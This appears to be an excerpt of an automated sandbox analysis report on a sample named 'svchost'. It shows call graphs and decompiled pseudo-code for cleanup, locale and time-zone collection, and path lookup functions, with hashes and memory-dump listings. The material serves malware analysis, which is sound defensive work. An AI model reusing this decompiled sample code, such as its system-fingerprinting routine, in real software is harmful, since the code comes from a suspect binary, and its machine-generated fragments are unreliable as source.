35 API calls 59229->59230 59231 46d2ad GetLocaleInfoA 59230->59231 59232 4833ff ctype 35 API calls 59231->59232 59233 46d2c6 GetLocaleInfoA 59232->59233 59234 4833ff ctype 35 API calls 59233->59234 59235 46d2df GetSystemDefaultLangID VerLanguageNameA 59234->59235 59236 46d314 GetTimeZoneInformation 59235->59236 59237 46d304 59235->59237 59239 46d327 wsprintfA 59236->59239 59240 4688f5 59236->59240 59238 4833ff ctype 35 API calls 59237->59238 59238->59236 59241 4833ff ctype 35 API calls 59239->59241 59240->58895 59241->59240 59243 483054 59242->59243 59244 483046 InterlockedIncrement 59242->59244 59246 4833ff ctype 35 API calls 59243->59246 59245 468919 59244->59245 59245->58831 59246->59245 59249 470935 59247->59249 59250 470963 59249->59250 59253 4782d2 6 API calls 59249->59253 59252 4689ac 59250->59252 59254 4782d2 6 API calls 59250->59254 59252->58843 59253->59249 59254->59250 59255 484d30 59256 484d3d 59255->59256 59257 484d42 59255->59257 59263 484cab 59257->59263 59259 484d4b 59260 484d66 NtdllDefWindowProc_A 59259->59260 59261 484d54 59259->59261 59260->59256 59262 484ab9 98 API calls 59261->59262 59262->59256 59264 484c12 ctype 57 API calls 59263->59264 59265 484cb2 ctype 59264->59265 59265->59259 59266 4854d0 59267 4854d9 59266->59267 59268 4854dd 59266->59268 59269 484c12 ctype 57 API calls 59268->59269 59270 4854e6 ctype 59269->59270 59271 4854fa DestroyWindow 59270->59271 59272 485505 59270->59272 59271->59272 59273 485517 59272->59273 59275 484d02 57 API calls ctype 59272->59275 59275->59273 59276 46fd5c GetVersion 59308 474e11 HeapCreate 59276->59308 59278 46fdba 59279 46fdc7 59278->59279 59280 46fdbf 59278->59280 59320 474bce 37 API calls __startOneArgErrorHandling 59279->59320 59328 46fe89 8 API calls ___free_lc_time 59280->59328 59284 46fdcc 59285 46fdd0 59284->59285 59286 46fdd8 59284->59286 59329 46fe89 8 API calls ___free_lc_time 59285->59329 59321 474a12 34 API calls ___free_lc_time 59286->59321 59290 46fde2 GetCommandLineA 59322 4748e0 37 API calls 2 library calls 59290->59322 59292 46fdf2 59330 474693 49 API calls ___free_lc_time 59292->59330 59294 46fdfc 59323 4745da 48 API calls ___free_lc_time 59294->59323 59296 46fe01 59297 46fe06 GetStartupInfoA 59296->59297 59324 474582 48 API calls 59297->59324 59299 46fe18 59300 46fe21 59299->59300 59301 46fe2a GetModuleHandleA 59300->59301 59325 480d6e 59301->59325 59305 46fe45 59332 47440a 36 API calls __startOneArgErrorHandling 59305->59332 59307 46fe56 59309 474e67 59308->59309 59310 474e31 59308->59310 59309->59278 59333 474cc9 57 API calls 59310->59333 59312 474e36 59313 474e40 59312->59313 59314 474e4d 59312->59314 59334 478715 RtlAllocateHeap 59313->59334 59316 474e6a 59314->59316 59335 47925c 5 API calls ctype 59314->59335 59316->59278 59317 474e4a 59317->59316 59319 474e5b HeapDestroy 59317->59319 59319->59309 59320->59284 59321->59290 59322->59292 59323->59296 59324->59299 59336 489251 59325->59336 59330->59294 59331 4738c3 32 API calls 59331->59305 59332->59307 59333->59312 59334->59317 59335->59317 59337 48925c 59336->59337 59338 48c6bf ctype 28 API calls 59337->59338 59339 489263 59338->59339 59344 48d4a3 SetErrorMode SetErrorMode 59339->59344 59342 46fe3c 59342->59331 59343 48927b 59356 48db39 60 API calls ctype 59343->59356 59345 48c6bf ctype 28 API calls 59344->59345 59346 48d4ba 59345->59346 59347 48c6bf ctype 28 API calls 59346->59347 59348 48d4c9 59347->59348 59349 48d4ef 59348->59349 59350 48d4d0 59348->59350 59352 48c6bf ctype 28 API calls 59349->59352 59368 48d506 63 API calls ctype 59350->59368 59353 48d4f4 59352->59353 59354 48d500 59353->59354 59357 487fcd 59353->59357 59354->59343 59356->59342 59358 48c6bf ctype 28 API calls 59357->59358 59359 487fd2 59358->59359 59360 48802a 59359->59360 59369 48c48d 59359->59369 59360->59354 59363 48ccdc ctype 7 API calls 59364 488008 59363->59364 59365 488015 59364->59365 59366 48c6bf ctype 28 API calls 59364->59366 59367 48cc47 ctype 21 API calls 59365->59367 59366->59365 59367->59360 59368->59349 59370 48cc47 ctype 21 API calls 59369->59370 59371 487fde GetCurrentThreadId SetWindowsHookExA 59370->59371 59371->59363 59372 47c0da SetUnhandledExceptionFilter

    Executed Functions

    Function 00418600 Relevance: 18.3, APIs: 12, Instructions: 273threadwindownetworkCOMMONCrypto
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 244 418600-418623 245 418625-418631 GetCurrentThreadId 244->245 246 41867e-4186b1 call 4173a0 244->246 245->246 247 418633-41863e 245->247 256 4186b3-4186c4 246->256 257 4186df-4186f7 call 40b7d0 246->257 249 418660-418668 247->249 250 418640-418649 IsWindow 247->250 253 418991-418997 249->253 254 41866e-41866f ExitProcess 249->254 250->249 252 41864b-41865a SendMessageA 250->252 252->249 259 4186d7-4186dd 256->259 260 4186c6-4186d4 256->260 263 4186f9-418704 257->263 264 41871c-41873d call 40b7d0 * 2 257->264 259->256 259->257 260->259 265 418717-41871a 263->265 266 418706-418712 263->266 271 41878a-418795 264->271 272 41873f-418743 264->272 265->263 265->264 266->265 275 418797-41879b 271->275 276 4187cc-4187f4 call 417a30 call 48324d 271->276 273 418745-418750 272->273 274 41875e-418785 call 40b7d0 * 4 272->274 277 418752-418753 FreeLibrary 273->277 278 418759-41875c 273->278 274->271 281 4187b2-4187c7 call 40b7d0 call 482437 275->281 282 41879d-4187b0 FreeLibrary 275->282 292 418803-41880b 276->292 293 4187f6-4187fd DestroyCursor 276->293 277->278 278->273 278->274 281->276 282->281 282->282 295 41881a-418822 292->295 296 41880d-418814 DestroyCursor 292->296 293->292 299 418824-41882d IsWindow 295->299 300 41884e-418862 call 4161a0 295->300 296->295 299->300 302 41882f-418837 call 484c12 299->302 305 418864-41886f 300->305 306 41887f-41889c call 4826d1 call 41a8c0 300->306 311 418839-41883f 302->311 312 418848 302->312 308 418871-418877 305->308 309 41887a-41887d 305->309 317 4188a2 306->317 318 41889e-4188a0 306->318 308->309 309->305 309->306 311->312 312->300 319 4188a8-4188b3 317->319 318->319 320 4188b5-4188b8 319->320 321 41890b-41891d call 40b7d0 319->321 322 4188bb-4188bf 320->322 327 41892b-418935 321->327 328 41891f-418925 WSACleanup 321->328 325 4188c1-4188d1 322->325 326 4188f9-418909 322->326 329 4188d3-4188da DestroyCursor 325->329 330 4188dd-4188e2 325->330 326->321 326->322 331 418937-418957 call 4181f0 327->331 332 418959-41897f call 482437 * 2 327->332 328->327 329->330 333 4188f0-4188f6 call 48302c 330->333 334 4188e4-4188ed call 48302c 330->334 331->332 332->253 345 418981-418987 OleUninitialize 332->345 333->326 334->333 345->253
    C-Code - Quality: 84%
    			E00418600(unsigned int __ecx, int _a4) {
				unsigned int _v8;
				unsigned int _v12;
				void* __esi;
				void* __ebp;
				unsigned int _t102;
				struct HICON__* _t108;
				struct HICON__* _t109;
				struct HWND__* _t110;
				int _t112;
				unsigned int _t116;
				long _t120;
				void* _t121;
				unsigned int _t127;
				struct HICON__* _t128;
				struct HINSTANCE__* _t148;
				intOrPtr _t151;
				struct HWND__* _t155;
				unsigned int _t160;
				unsigned int _t162;
				unsigned int _t164;
				intOrPtr _t166;
				signed int _t172;
				int _t181;
				intOrPtr* _t189;
				intOrPtr _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				signed int _t210;
				signed int _t211;
				int _t212;
				signed int _t213;
				void* _t214;

				_t213 = __ecx;
				_v8 = __ecx;
				 *((intOrPtr*)(__ecx + 0x1d4)) =  *((intOrPtr*)(__ecx + 0x1d4)) + 1;
				if( *((intOrPtr*)(__ecx + 0x228)) == 0 || GetCurrentThreadId() ==  *((intOrPtr*)(_t213 + 0x228))) {
					 *(_t213 + 0x42c) = 1;
					E004173A0(_t213);
					 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x104)) + 8))();
					_t172 = 0;
					_t102 =  *(_t213 + 0x420) >> 2;
					_v12 = _t102;
					_a4 = 0;
					if(_t102 > 0) {
						do {
							_t205 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x418)) + _t172 * 4));
							 *0x4bd320 = _t205;
							if(_t205 != 0) {
								asm("pushad");
								 *0x4bd320();
								asm("popad");
								_t213 = _v8;
								_t172 = _a4;
								_t102 = _v12;
							}
							_t172 = _t172 + 1;
							_a4 = _t172;
						} while (_t172 < _t102);
					}
					E0040B7D0(_t213 + 0x410);
					_t206 = 0;
					_t160 =  *(_t213 + 0x130) >> 2;
					if(_t160 > 0) {
						do {
							_t151 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x128)) + _t206 * 4));
							if(_t151 != 0) {
								 *((intOrPtr*)(_t151 + 0x78))(6,  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x13c)) + _t206 * 4)), 0);
							}
							_t206 = _t206 + 1;
						} while (_t206 < _t160);
					}
					E0040B7D0(_t213 + 0x134);
					E0040B7D0(_t213 + 0x120);
					_t162 =  *(_t213 + 0x180) >> 2;
					if(_t162 > 0) {
						_t211 = 0;
						if(_t162 > 0) {
							do {
								_t148 =  *( *((intOrPtr*)(_t213 + 0x178)) + _t211 * 4);
								if(_t148 != 0) {
									FreeLibrary(_t148);
								}
								_t211 = _t211 + 1;
							} while (_t211 < _t162);
						}
						E0040B7D0(_t213 + 0x170);
						E0040B7D0(_t213 + 0x184);
						E0040B7D0(_t213 + 0x148);
						E0040B7D0(_t213 + 0x15c);
					}
					_t164 =  *(_t213 + 0x1b0) >> 2;
					if(_t164 > 0) {
						_t210 = 0;
						if(_t164 > 0) {
							do {
								FreeLibrary( *( *((intOrPtr*)(_t213 + 0x1a8)) + _t210 * 4));
								_t210 = _t210 + 1;
							} while (_t210 < _t164);
						}
						E0040B7D0(_t213 + 0x1a0);
						E00482437(_t213 + 0x1b4, 0, 0xffffffff);
					}
					E00417A30(_t213, _t213);
					E0048324D(_t213 + 0x1d0, _t213);
					_t108 =  *(_t213 + 0x424);
					 *((intOrPtr*)(_t213 + 0x19c)) = 0;
					 *((intOrPtr*)(_t213 + 0x198)) = 0;
					if(_t108 != 0) {
						DestroyCursor(_t108);
						 *(_t213 + 0x424) = 0;
					}
					_t109 =  *(_t213 + 0x428);
					if(_t109 != 0) {
						DestroyCursor(_t109);
						 *(_t213 + 0x428) = 0;
					}
					_t110 =  *(_t213 + 0x3e4);
					if(_t110 != 0 && IsWindow(_t110) != 0) {
						_push(0);
						if(E00484C12() != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x3c8)) + 0x58))();
						}
						 *(_t213 + 0x3e4) = 0;
					}
					E004161A0(_t213);
					_t112 =  *((intOrPtr*)(_t213 + 0x3ac));
					_t207 = 0;
					_a4 = _t112;
					if(_t112 > 0) {
						do {
							_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x3a8)) + _t207 * 4));
							if(_t189 != 0) {
								 *((intOrPtr*)( *_t189))(1);
								_t112 = _a4;
							}
							_t207 = _t207 + 1;
						} while (_t207 < _t112);
					}
					E004826D1(_t213 + 0x3a4, 0, 0xffffffff);
					E0041A8C0(_t213, 1);
					if( *(_t213 + 0x264) != 0) {
						_t181 =  *((intOrPtr*)(_t213 + 0x25c));
					} else {
						_t181 = 0;
					}
					_t116 =  *(_t213 + 0x264) >> 2;
					if(_t116 > 0) {
						_a4 = _t181;
						_v8 = _t116;
						do {
							_t209 =  *_t181;
							if(_t209 != 0) {
								_t128 =  *(_t209 + 0xc);
								 *_t209 = 0;
								 *((intOrPtr*)(_t209 + 4)) = 0;
								 *((intOrPtr*)(_t209 + 8)) = 0;
								 *((intOrPtr*)(_t209 + 0x14)) = 0;
								if(_t128 != 0) {
									DestroyCursor(_t128);
									 *(_t209 + 0xc) = 0;
								}
								_t129 =  *((intOrPtr*)(_t209 + 0x10));
								if( *((intOrPtr*)(_t209 + 0x10)) != 0) {
									E0048302C(_t129);
									_t214 = _t214 + 4;
									 *((intOrPtr*)(_t209 + 0x10)) = 0;
								}
								E0048302C(_t209);
								_t214 = _t214 + 4;
							}
							_t181 = _a4 + 4;
							_t127 = _v8 - 1;
							_a4 = _t181;
							_v8 = _t127;
						} while (_t127 != 0);
					}
					E0040B7D0(_t213 + 0x254);
					if( *((intOrPtr*)(_t213 + 0x3a0)) == 1) {
						 *0x492698();
						 *((intOrPtr*)(_t213 + 0x3a0)) = 0;
					}
					_t166 =  *((intOrPtr*)(_t213 + 0xf8));
					_t208 = 0;
					if(_t166 > 0) {
						do {
							E004181F0(_t213,  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0xe0)) + _t208 * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0xf4)) + _t208 * 4)), 0);
							_t208 = _t208 + 1;
						} while (_t208 < _t166);
					}
					E00482437(_t213 + 0xdc, 0, 0xffffffff);
					E00482437(_t213 + 0xf0, 0, 0xffffffff);
					_t120 =  *(_t213 + 0x404);
					if(_t120 != 0) {
						_t121 =  *0x4926e4(); // executed
						 *(_t213 + 0x404) = 0;
						return _t121;
					}
				} else {
					_t155 =  *(_t213 + 0x3e4);
					_t212 = _a4;
					if(_t155 != 0 && IsWindow(_t155) != 0) {
						SendMessageA( *(_t213 + 0x3e4), 0x83e7, _t212, 0);
					}
					_t120 =  *(_t213 + 0x42c);
					if(_t120 == 0) {
						ExitProcess(_t212);
					}
				}
				return _t120;
			}





































    0x00418608
    0x0041860b
    0x0041861d
    0x00418623
    0x00418680
    0x0041868a
    0x0041869b
    0x004186a4
    0x004186a6
    0x004186ab
    0x004186ae
    0x004186b1
    0x004186b3
    0x004186b9
    0x004186be
    0x004186c4
    0x004186c6
    0x004186c7
    0x004186cd
    0x004186ce
    0x004186d1
    0x004186d4
    0x004186d4
    0x004186d7
    0x004186da
    0x004186da
    0x004186b3
    0x004186e5
    0x004186f0
    0x004186f2
    0x004186f7
    0x004186f9
    0x004186ff
    0x00418704
    0x00418714
    0x00418714
    0x00418717
    0x00418718
    0x004186f9
    0x00418722
    0x0041872d
    0x00418738
    0x0041873d
    0x0041873f
    0x00418743
    0x00418745
    0x0041874b
    0x00418750
    0x00418753
    0x00418753
    0x00418759
    0x0041875a
    0x00418745
    0x00418764
    0x0041876f
    0x0041877a
    0x00418785
    0x00418785
    0x00418790
    0x00418795
    0x00418797
    0x0041879b
    0x0041879d
    0x004187a7
    0x004187ad
    0x004187ae
    0x0041879d
    0x004187b8
    0x004187c7
    0x004187c7
    0x004187ce
    0x004187d9
    0x004187de
    0x004187e8
    0x004187ee
    0x004187f4
    0x004187f7
    0x004187fd
    0x004187fd
    0x00418803
    0x0041880b
    0x0041880e
    0x00418814
    0x00418814
    0x0041881a
    0x00418822
    0x0041882f
    0x00418837
    0x00418845
    0x00418845
    0x00418848
    0x00418848
    0x00418850
    0x00418855
    0x0041885b
    0x0041885f
    0x00418862
    0x00418864
    0x0041886a
    0x0041886f
    0x00418875
    0x00418877
    0x00418877
    0x0041887a
    0x0041887b
    0x00418864
    0x00418888
    0x00418891
    0x0041889c
    0x004188a2
    0x0041889e
    0x0041889e
    0x0041889e
    0x004188ae
    0x004188b3
    0x004188b5
    0x004188b8
    0x004188bb
    0x004188bb
    0x004188bf
    0x004188c1
    0x004188c4
    0x004188c8
    0x004188cb
    0x004188ce
    0x004188d1
    0x004188d4
    0x004188da
    0x004188da
    0x004188dd
    0x004188e2
    0x004188e5
    0x004188ea
    0x004188ed
    0x004188ed
    0x004188f1
    0x004188f6
    0x004188f6
    0x004188ff
    0x00418902
    0x00418903
    0x00418906
    0x00418906
    0x004188bb
    0x00418911
    0x0041891d
    0x0041891f
    0x00418925
    0x00418925
    0x0041892b
    0x00418931
    0x00418935
    0x00418937
    0x0041894f
    0x00418954
    0x00418955
    0x00418937
    0x00418963
    0x00418972
    0x00418977
    0x0041897f
    0x00418981
    0x00418987
    0x00000000
    0x00418987
    0x00418633
    0x00418633
    0x00418639
    0x0041863e
    0x0041865a
    0x0041865a
    0x00418660
    0x00418668
    0x0041866f
    0x0041866f
    0x00418668
    0x00418997

    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CursorDestroy$FreeLibraryWindow$CleanupCurrentExitMessageProcessSendThread
    • String ID:
    • API String ID: 2560087610-0
    • Opcode ID: caa0337d093cc15d8a40d9360654fb79e38eb03f2c24204fc3923a337e9f66e6
    • Instruction ID: cd86c5fd5b554d2206fba4c362b2b5e48e2ae581dd0e7a02e3bdbaba295f60aa
    • Opcode Fuzzy Hash: caa0337d093cc15d8a40d9360654fb79e38eb03f2c24204fc3923a337e9f66e6
    • Instruction Fuzzy Hash: 2BB19C706007029BC724EF65C9D5BEBB3E4BF88304F50493EE5AA87281DF34A985CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0046D210 Relevance: 16.6, APIs: 11, Instructions: 106timeCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 100%
    			E0046D210(void* __ecx) {
				char _v260;
				char _v276;
				char _v520;
				struct _TIME_ZONE_INFORMATION _v692;
				char _v796;
				char _v800;
				char _v816;
				char _v824;
				char _v840;
				char _v844;
				int _t46;
				long _t48;
				void* _t73;
				int _t75;

				_t73 = __ecx;
				_t75 = GetKeyboardLayout(0) & 0x0000ffff;
				GetLocaleInfoA(_t75, 0x1004,  &_v840, 7);
				 *((intOrPtr*)(_t73 + 4)) = E004709B8( &_v840,  &_v840);
				GetLocaleInfoA(_t75, 0x1002,  &_v520, 0x104);
				E004833FF(_t73 + 0xc,  &_v520);
				GetLocaleInfoA(_t75, 5,  &_v844, 7);
				 *((intOrPtr*)(_t73 + 0x10)) = E004709B8( &_v844,  &_v844);
				GetLocaleInfoA(_t75, 0x1003,  &_v796, 0x64);
				E004833FF(_t73 + 0x14,  &_v796);
				GetLocaleInfoA(_t75, 0x20,  &_v800, 0x64);
				E004833FF(_t73 + 8,  &_v800);
				GetLocaleInfoA(_t75, 0x14,  &_v844, 7);
				E004833FF(_t73 + 0x18,  &_v844);
				_t46 = VerLanguageNameA(GetSystemDefaultLangID() & 0x0000ffff,  &_v276, 0x104); // executed
				if(_t46 <= 0x104) {
					E004833FF(_t73 + 0x1c,  &_v260);
				}
				_t48 = GetTimeZoneInformation( &_v692); // executed
				if(_t48 != 0xffffffff) {
					wsprintfA( &_v824, "%S",  &(_v692.StandardName));
					return E004833FF(_t73 + 0x20,  &_v816);
				}
				return _t48;
			}

















    0x0046d219
    0x0046d231
    0x0046d23e
    0x0046d254
    0x0046d263
    0x0046d270
    0x0046d27f
    0x0046d28e
    0x0046d29e
    0x0046d2a8
    0x0046d2b7
    0x0046d2c1
    0x0046d2d0
    0x0046d2da
    0x0046d2f8
    0x0046d302
    0x0046d30f
    0x0046d30f
    0x0046d31c
    0x0046d325
    0x0046d339
    0x00000000
    0x0046d34a
    0x0046d358

    APIs
    • GetKeyboardLayout.USER32(00000000), ref: 0046D21D
    • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007,?,?), ref: 0046D23E
    • GetLocaleInfoA.KERNEL32(00000000,00001002,?,00000104), ref: 0046D263
    • GetLocaleInfoA.KERNEL32(00000000,00000005,?,00000007,?), ref: 0046D27F
    • GetLocaleInfoA.KERNEL32(00000000,00001003,?,00000064), ref: 0046D29E
      • Part of subcall function 004833FF: lstrlen.KERNEL32(?,?,?,00481582,?), ref: 00483410
    • GetLocaleInfoA.KERNEL32(00000000,00000020,?,00000064,?), ref: 0046D2B7
    • GetLocaleInfoA.KERNEL32(00000000,00000014,?,00000007,?), ref: 0046D2D0
    • GetSystemDefaultLangID.KERNEL32(?), ref: 0046D2DF
    • VerLanguageNameA.VERSION(00000000,?,00000104), ref: 0046D2F8
    • GetTimeZoneInformation.KERNELBASE(?,00000000,?,00000104), ref: 0046D31C
    • wsprintfA.USER32 ref: 0046D339
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: InfoLocale$DefaultInformationKeyboardLangLanguageLayoutNameSystemTimeZonelstrlenwsprintf
    • String ID:
    • API String ID: 3783830871-0
    • Opcode ID: 43b210839b6e7734696f73e40a76b0b2129abbc6f133083619ec1c5d2a322214
    • Instruction ID: a6e053351c879639cc2d21686017044e5abc3a235cba03868aeb78416537ce34
    • Opcode Fuzzy Hash: 43b210839b6e7734696f73e40a76b0b2129abbc6f133083619ec1c5d2a322214
    • Instruction Fuzzy Hash: BE3189B15043017FD214EB60CC86EEFB368EF94715F40892EFA55461C0FBB8A609C7AA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00483CEE Relevance: 12.1, APIs: 8, Instructions: 72stringfileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 469 483cee-483d19 call 473304 GetFullPathNameA 472 483d1b-483d28 lstrcpyn 469->472 473 483d2d-483d5c call 483dbe GetVolumeInformationA 469->473 474 483dae-483dbb 472->474 477 483d5e-483d62 473->477 478 483da0-483dac call 4832c2 473->478 479 483d6b-483d6f 477->479 480 483d64-483d65 CharUpperA 477->480 478->474 482 483d9d-483d9f 479->482 483 483d71-483d84 FindFirstFileA 479->483 480->479 482->478 483->482 485 483d86-483d97 FindClose lstrcpy 483->485 485->482
    C-Code - Quality: 60%
    			E00483CEE() {
				CHAR* _t29;
				int _t34;
				CHAR* _t36;
				void* _t38;
				CHAR* _t47;
				void* _t53;

				E00473304(E00490BE0, _t53);
				_t47 =  *(_t53 + 8);
				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
					_t29 =  *0x4b8924; // 0x4b8938
					 *(_t53 + 8) = _t29;
					_push(_t53 + 8);
					 *(_t53 - 4) = 0;
					E00483DBE(_t53, _t47);
					_t34 = GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0); // executed
					if(_t34 != 0) {
						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
							CharUpperA(_t47);
						}
						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
							if(_t38 != 0xffffffff) {
								FindClose(_t38);
								 *0x4922a8( *(_t53 - 0x14), _t53 - 0x12c);
							}
						}
						_push(1);
						_pop(0);
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E004832C2(_t53 + 8);
					_t36 = 0;
				} else {
					 *0x492214(_t47,  *(_t53 + 0xc), 0x104);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}









    0x00483cf3
    0x00483d00
    0x00483d19
    0x00483d2d
    0x00483d32
    0x00483d3a
    0x00483d3c
    0x00483d3f
    0x00483d54
    0x00483d5c
    0x00483d62
    0x00483d65
    0x00483d65
    0x00483d6f
    0x00483d7b
    0x00483d84
    0x00483d87
    0x00483d97
    0x00483d97
    0x00483d84
    0x00483d9d
    0x00483d9f
    0x00483d9f
    0x00483da0
    0x00483da7
    0x00483dac
    0x00483d1b
    0x00483d20
    0x00483d26
    0x00483d26
    0x00483db3
    0x00483dbb

    APIs
    • __EH_prolog.LIBCMT ref: 00483CF3
    • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?), ref: 00483D11
    • lstrcpyn.KERNEL32(?,?,00000104), ref: 00483D20
    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00483D54
    • CharUpperA.USER32(?), ref: 00483D65
    • FindFirstFileA.KERNEL32(?,?), ref: 00483D7B
    • FindClose.KERNEL32(00000000), ref: 00483D87
    • lstrcpy.KERNEL32(?,?), ref: 00483D97
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
    • String ID:
    • API String ID: 304730633-0
    • Opcode ID: 9b4355d901b2660a762ec737d7bfddb323e8ac036359215d9167ae87e33fbe59
    • Instruction ID: 316965b4bb1bfe055935fff34fb401c1224924c8ea11d1db71ce3ff0721406ed
    • Opcode Fuzzy Hash: 9b4355d901b2660a762ec737d7bfddb323e8ac036359215d9167ae87e33fbe59
    • Instruction Fuzzy Hash: 8A218971500019BBCB21AF61DD08EEF7FBCEF45B65F00856AF919E20A0D7748A45CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048D74C Relevance: 6.1, APIs: 4, Instructions: 63COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 524 48d74c-48d7fd GetVersion 526 48d7ff-48d80e GetProcessVersion 524->526 527 48d811-48d813 call 4891f9 524->527 526->527 529 48d818-48d858 call 4891b5 LoadCursorA * 2 527->529
    C-Code - Quality: 90%
    			E0048D74C() {
				unsigned int _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				long _t28;
				void* _t40;
				void* _t50;

				_t50 = 0x4e14d8;
				_t18 = GetVersion();
				 *0x004E152C = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
				 *0x004E1530 = _t18 >> 0x1f;
				asm("sbb eax, eax");
				_t40 = 1;
				_t19 = _t18 + 1;
				 *0x004E1534 = _t19;
				 *0x004E1538 = _t40 - _t19;
				 *0x004E153C = _t19;
				 *0x004E1540 = 0;
				if(_t19 != 0) {
					_t28 = GetProcessVersion(0); // executed
					asm("sbb eax, eax");
					 *((intOrPtr*)(0x4e1540)) = _t28 + 1;
				}
				E004891F9(_t50);
				 *((intOrPtr*)(_t50 + 0x24)) = 0;
				E004891B5(_t50);
				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
